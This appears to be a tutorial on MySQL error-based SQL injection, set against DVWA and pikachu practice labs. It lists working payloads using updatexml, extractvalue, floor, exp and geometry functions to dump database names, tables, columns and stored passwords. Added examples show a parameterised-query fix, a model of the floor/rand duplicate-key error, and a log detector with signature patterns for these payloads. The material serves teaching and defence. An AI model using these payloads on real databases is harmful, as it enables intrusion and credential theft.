SQL injection: a graphic explanation of error-based injection functions

Contents

Commonly used error-reporting functions

Usage details

updatexml() function

extractvalue() function

floor() function

exp() function

12 error-reporting injection functions



The premise of error-based injection is that when a statement contains an error, the error message is output to the front end. The vulnerability arises because developers use print_r(), mysql_error() or mysqli_connect_error() to print the MySQL error information to the page, so an attacker can close the original statement's string literal and get the appended statement executed.
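The paragraph above names the two developer mistakes that make error-based injection possible: building the SQL text by string concatenation and printing the raw database error to the page. The following Python example is added here to show the vulnerable pattern and its fix side by side; it is not code from the original post. It uses Python's bundled sqlite3 as a stand-in for MySQL, and the `user` table, the handler names and the inputs are constructed for the example.

```python
import logging
import sqlite3

# Added example (not from the original post). sqlite3 stands in for MySQL
# because it ships with Python; the defect and the fix are the same in both:
# the application glues user input into the SQL text and then echoes the raw
# database error back to the client.

log = logging.getLogger("registration")


def make_db():
    """Create an in-memory schema modelled on the post's `user` table (constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table user(name text, password text)")
    return conn


def register_vulnerable(conn, name, password):
    """Vulnerable: string concatenation plus the raw error echoed to the front end.

    This is the pattern the post describes (mysql_error() printed to the page):
    a single quote in `name` closes the literal, and the resulting error text,
    which the attacker influences, goes straight back to the client."""
    sql = f"insert into user(name, password) values('{name}', '{password}')"
    try:
        conn.execute(sql)
        conn.commit()
        return "ok"
    except sqlite3.Error as exc:
        return f"Error: {exc}"  # the information leak


def register_hardened(conn, name, password):
    """Hardened: parameterised query plus a generic error for the client.

    The quote can no longer terminate the literal, so it is stored as data, and
    any database error is logged server-side instead of being displayed."""
    try:
        conn.execute("insert into user(name, password) values(?, ?)", (name, password))
        conn.commit()
        return "ok"
    except sqlite3.Error:
        log.exception("registration failed")  # detail stays in the server log
        return "registration failed"


def stored_names(conn):
    """Names currently in the table, so the effect of each handler can be checked."""
    return [row[0] for row in conn.execute("select name from user")]


if __name__ == "__main__":
    probe = "x'"  # the post's first probe: a lone single quote in the user name
    db = make_db()
    print("vulnerable:", register_vulnerable(db, probe, "pw"))  # raw SQL error echoed
    print("hardened:  ", register_hardened(db, probe, "pw"))    # quote stored as data
    print("rows:", stored_names(db))
```

The hardened handler fixes both halves of the problem: the parameter binding removes the ability to close the string literal, and the generic response removes the error channel the rest of this article relies on. Logging the exception server-side keeps the diagnostic value for the operator without exposing it to the client.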

Commonly used error-reporting functions

updatexml()      MySQL XPath function that queries and modifies data in an XML document
extractvalue()   MySQL XPath function that queries data in an XML document
floor()          MySQL function that rounds down to an integer
exp()            returns e (the base of the natural logarithm) raised to the power X

Usage details

updatexml() function

updatexml() changes (finds and replaces) the value of the nodes in an XML document that match the given XPath expression.

Syntax: updatexml(xml_document, XPath_string, new_value)

The first parameter is a string (the name of the XML document object).

The second parameter specifies a location in the string (an XPath-format string).

The third parameter is the replacement value, in string format.

The XPath expression must be valid, otherwise MySQL raises an error. This is the feature we use to leak the data we want through the error message.


Registration adds data to the database: an insert.

Typing a single quote in the user name field produces an error.

Guess the back-end statement:

insert into user(name,password,sex,phone,address1,address2) value('xxx',123,1,2,3,4)

At xxx we can close the single quote and reveal the data we want:

?id=1' or updatexml(0,concat(0x7e,(select database())),1)'

Closing the single quote breaks out of the string literal, and the rest of the statement is rebuilt around the injected query. The database name dumped this way is "pikachu".

The analysis process

When the payload entered is

?id=1' or updatexml(0,concat(0x7e,(select database())),1)or'

the back end splices it into

insert into user(name,password,sex,phone,address1,address2) value('' or updatexml(1,concat(0x7e,database()),0) or '',

The table name and column fields are the same as in a normal query; only their positions in the statement have changed.

Usage process

Database name

1'and updatexml(1,concat(0x7e,database(),0x7e,user(),0x7e,@@datadir),1)#

Table names

1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) #

Column names (assuming there is a users table and the database is dvwa)

1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='dvwa' and table_name='users'),0x7e),1) #

Field values (assuming the column name is last_name; dvwa.users means the users table of the dvwa database)

1' and updatexml(1,concat(0x7e,(select group_concat(first_name,0x7e,last_name) from dvwa.users)),1) #

extractvalue() function

extractvalue() returns a string containing the value selected by the XPath query from the target XML.

extractvalue(XML_document, XPath_string);

The first parameter, XML_document, is a string: the name of the XML document object (doc in this article).

The second parameter, XPath_string, is an XPath-format string; the XPath expression must be valid, otherwise an error is raised.

Constructing the payload

?id=1' or extractvalue(0,concat(0x7e,database())) or '

Note that the XPath error echo is limited: it shows at most 32 characters, so use limit to extract rows one at a time; anything beyond the 32nd character is not displayed.

Usage process

Current database

1' and extractvalue(1,concat(0x7e,user(),0x7e,database())) #

Current tables

1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) #

Table information (assuming the table is users)

1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))) #

Field values (the columns are user_id, first_name and last_name; dvwa.users means the users table of the dvwa database)

1' and extractvalue(1,concat(0x7e,(select group_concat(user_id,0x7e,first_name,0x3a,last_name) from dvwa.users))) #

floor() function

floor() is MySQL's function for rounding down to an integer.

Database name

id=1' union select count(*),concat(floor(rand(0)*2),database()) x from information_schema.schemata group by x #
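Why does this statement produce an error rather than a normal result set? The post does not say, so the following Python model is added here; it is not the post's code and it is a simplified re-implementation, not MySQL itself. It reproduces MySQL's seeded RAND() generator, so that floor(rand(0)*2) yields the same 0,1,1,0,1,1,... sequence it does on a real server, and it models how GROUP BY evaluates its key expression a second time when it inserts a new group into its temporary table. With three or more rows in the grouped table (information_schema.schemata normally has more), that second evaluation collides with a group that already exists and the temporary table's unique key rejects it. Because the key in the payload is concat(floor(rand(0)*2),database()), the duplicate-entry message MySQL returns carries the database name. The class and function names are this example's own assumptions.

```python
# Added example (not from the original post): a model of the two MySQL
# behaviours the floor() payload relies on. The real engine raises the error;
# this code only shows why it must.


class MySQLRand:
    """MySQL's seeded RAND(): a tiny LCG, so rand(0) is the same sequence on every server."""

    MAX = 0x3FFFFFFF  # MAX_RAND_VALUE in the MySQL source

    def __init__(self, seed=0):
        self.seed1 = (seed * 0x10001 + 55555555) % self.MAX
        self.seed2 = (seed * 0x10000001) % self.MAX

    def next(self):
        self.seed1 = (self.seed1 * 3 + self.seed2) % self.MAX
        self.seed2 = (self.seed1 + self.seed2 + 33) % self.MAX
        return self.seed1 / self.MAX


def floor_rand0_keys(n):
    """First n values of floor(rand(0)*2): 0,1,1,0,1,1,0,0,1,... regardless of the data."""
    r = MySQLRand(0)
    return [int(r.next() * 2) for _ in range(n)]


class DuplicateKeyError(Exception):
    """Stands in for MySQL's 'Duplicate entry ... for key ...' error."""


def group_by_with_unstable_key(row_count, key_source):
    """Model of GROUP BY over a temporary table keyed by the group expression.

    For each input row the engine evaluates the key to look it up; if the key
    is absent it evaluates the expression AGAIN while inserting the new group.
    With a non-deterministic key such as floor(rand(0)*2) the second value can
    already be present, and the temporary table's unique index rejects it."""
    groups = {}
    for _ in range(row_count):
        key = key_source()
        if key in groups:
            groups[key] += 1  # count(*) for an existing group
            continue
        key = key_source()  # re-evaluated on insert: this is the flaw
        if key in groups:
            raise DuplicateKeyError(f"Duplicate entry '{key}' for key 'group_key'")
        groups[key] = 1
    return groups


def simulate_floor_payload(row_count):
    """Run the model with floor(rand(0)*2) over `row_count` rows of the grouped table.

    Returns the group counts the query would produce, or the error message text
    if the query would fail (which is the outcome the payload is built for)."""
    r = MySQLRand(0)
    try:
        return group_by_with_unstable_key(row_count, lambda: int(r.next() * 2))
    except DuplicateKeyError as exc:
        return str(exc)


if __name__ == "__main__":
    print("floor(rand(0)*2) sequence:", floor_rand0_keys(8))
    for rows in (1, 2, 3):
        print(f"{rows} row(s):", simulate_floor_payload(rows))
```

Tracing three rows by hand gives the same result the model returns: row 1 computes key 0, finds no group, recomputes key 1 and inserts it; row 2 computes key 1 and increments the count; row 3 computes key 0, finds no group, recomputes key 1 and collides. The same trace also shows why a table with only one or two rows never errors, which is why the payloads on this page group over information_schema tables rather than over the application's own (possibly small) tables.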

Table names (the database is dvwa; increment the limit 0,1 value to look up tables one at a time: limit 1,1, limit 2,1, ...)

id=1' union select count(*),concat(floor(rand(0)*2),0x3a,(select concat(table_name) from information_schema.tables where table_schema='dvwa' limit 0,1)) x from information_schema.schemata group by x#

Column names (database: dvwa, table: users)

id=1' union select count(*),concat(floor(rand(0)*2),0x3a,(select concat(column_name) from information_schema.columns where table_name='users' and table_schema='dvwa' limit 0,1)) x from information_schema.schemata group by x#

Field values (columns: user, password; dvwa.users means the users table of the dvwa database)

id=1' union select count(*),concat(floor(rand(0)*2),0x3a,(select concat(user,0x3a,password) from dvwa.users limit 0,1)) x from information_schema.schemata group by x#

exp() function

When passed a value greater than 709, exp() raises an overflow error. The bitwise NOT (~) applied to the subquery result yields a very large unsigned integer, which is what pushes exp() past that limit.

Database name

id=1' or exp(~(SELECT * from(select database())a)) or '

Table names (database name: pikachu)

id=1' or exp(~(select * from(select group_concat(table_name) from information_schema.tables where table_schema = 'pikachu')a)) or '

Column names (table name: users)

id=1' or exp(~(select * from(select group_concat(column_name) from information_schema.columns where table_name = 'users')a)) or '

Field values (column name: password, table name: users)

id=1' or exp(~(select * from(select password from users limit 0,1)a)) or '

12 error-reporting injection functions

1. Error via floor(); the injection statement is as follows:

and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);

2. Error via extractvalue(); the injection statement is as follows:

and (extractvalue(1,concat(0x7e,(select user()),0x7e)));

3. Error via updatexml(); the injection statement is as follows:

and (updatexml(1,concat(0x7e,(select user()),0x7e),1));

4. Error via exp(); the injection statement is as follows:

and exp(~(select * from (select user())a));

5. Error via join; the injection statement is as follows:

select * from(select * from mysql.user a join mysql.user b)c;

6. Error via NAME_CONST; the injection statement is as follows:

and exists(select * from (select * from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c);

7. Error via GeometryCollection(); the injection statement is as follows:

and GeometryCollection((select * from(select user())a)b);

8. Error via polygon(); the injection statement is as follows:

and polygon((select * from(select user())a)b);

9. Error via multipoint(); the injection statement is as follows:

and multipoint((select * from(select user())a)b);

10. Error via multilinestring(); the injection statement is as follows:

and multilinestring((select * from(select user())a)b);

11. Error via multipolygon(); the injection statement is as follows:

and multipolygon((select * from(select user())a)b);

12. Error via linestring(); the injection statement is as follows:

and linestring((select * from(select user())a)b);

Summary
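Seen from the defender's side, the twelve statements above share a small set of function names that almost never appear in legitimate request parameters. The Python detector below is an added example, not part of the original post: it URL-decodes the query string of web-server access-log lines and reports which error-based function family each request uses. The log lines, client addresses and path names are constructed for the example, and the signature labels are this example's own names.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Added example (not from the original post). The regexes cover the twelve
# function families listed in the post; the labels are this example's own.
SIGNATURES = {
    "updatexml":            re.compile(r"\bupdatexml\s*\("),
    "extractvalue":         re.compile(r"\bextractvalue\s*\("),
    "floor_rand_group_by":  re.compile(r"\bfloor\s*\(\s*rand\s*\(.*\bgroup\s+by\b"),
    "exp_overflow":         re.compile(r"\bexp\s*\(\s*~"),
    "name_const":           re.compile(r"\bname_const\s*\("),
    "mysql_user_self_join": re.compile(r"\bmysql\.user\b.*\bjoin\b"),
    # geometry constructors fed a subquery: the form of items 7 to 12 above
    "geometry_subquery":    re.compile(
        r"\b(?:geometrycollection|polygon|multipoint|multilinestring|multipolygon|linestring)"
        r"\s*\(\s*\(\s*select\b"),
}

# Apache/nginx combined log format: client address first, request line in quotes.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')


def normalize(raw):
    """Decode twice (clients often double-encode), then collapse whitespace and case."""
    text = unquote_plus(unquote_plus(raw))
    return re.sub(r"\s+", " ", text).lower()


def classify(request_target):
    """Return the signature labels that match the query string of one request target."""
    query = normalize(urlsplit(request_target).query)
    return [name for name, pattern in SIGNATURES.items() if pattern.search(query)]


def scan_log(lines):
    """Return (client_ip, request_target, labels) for every line that trips a signature."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the expected format; skip rather than guess
        ip, target = m.groups()
        labels = classify(target)
        if labels:
            hits.append((ip, target, labels))
    return hits


# Constructed sample log lines (documentation-range addresses, invented paths).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /register.php?name=1%27+and+updatexml(1,concat(0x7e,database()),1)%23 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /register.php?name=1%27+and+extractvalue(1,concat(0x7e,(select+group_concat(table_name)+from+information_schema.tables+where+table_schema%3Ddatabase())))+%23 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [10/Oct/2023:13:56:01 +0000] "GET /register.php?name=alice&address1=Main+Street HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2023:13:56:10 +0000] "GET /vote.php?id=1%27+union+select+count(*),concat(floor(rand(0)*2),database())+x+from+information_schema.schemata+group+by+x+%23 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2023:13:56:20 +0000] "GET /vote.php?id=1%27+or+exp(~(select+*+from(select+database())a))+or+%27 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, target, labels in scan_log(SAMPLE_LOG):
        print(ip, labels, target)
```

The geometry signature deliberately requires a subquery inside the constructor, so a legitimate GIS parameter such as polygon((1 1,2 2)) does not fire; exp( and the geometry names can still occur in maths- or map-heavy applications, so treat these hits as triage signals and correlate them with the database error log, where the same requests leave MySQL's XPATH syntax error and Duplicate entry messages.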

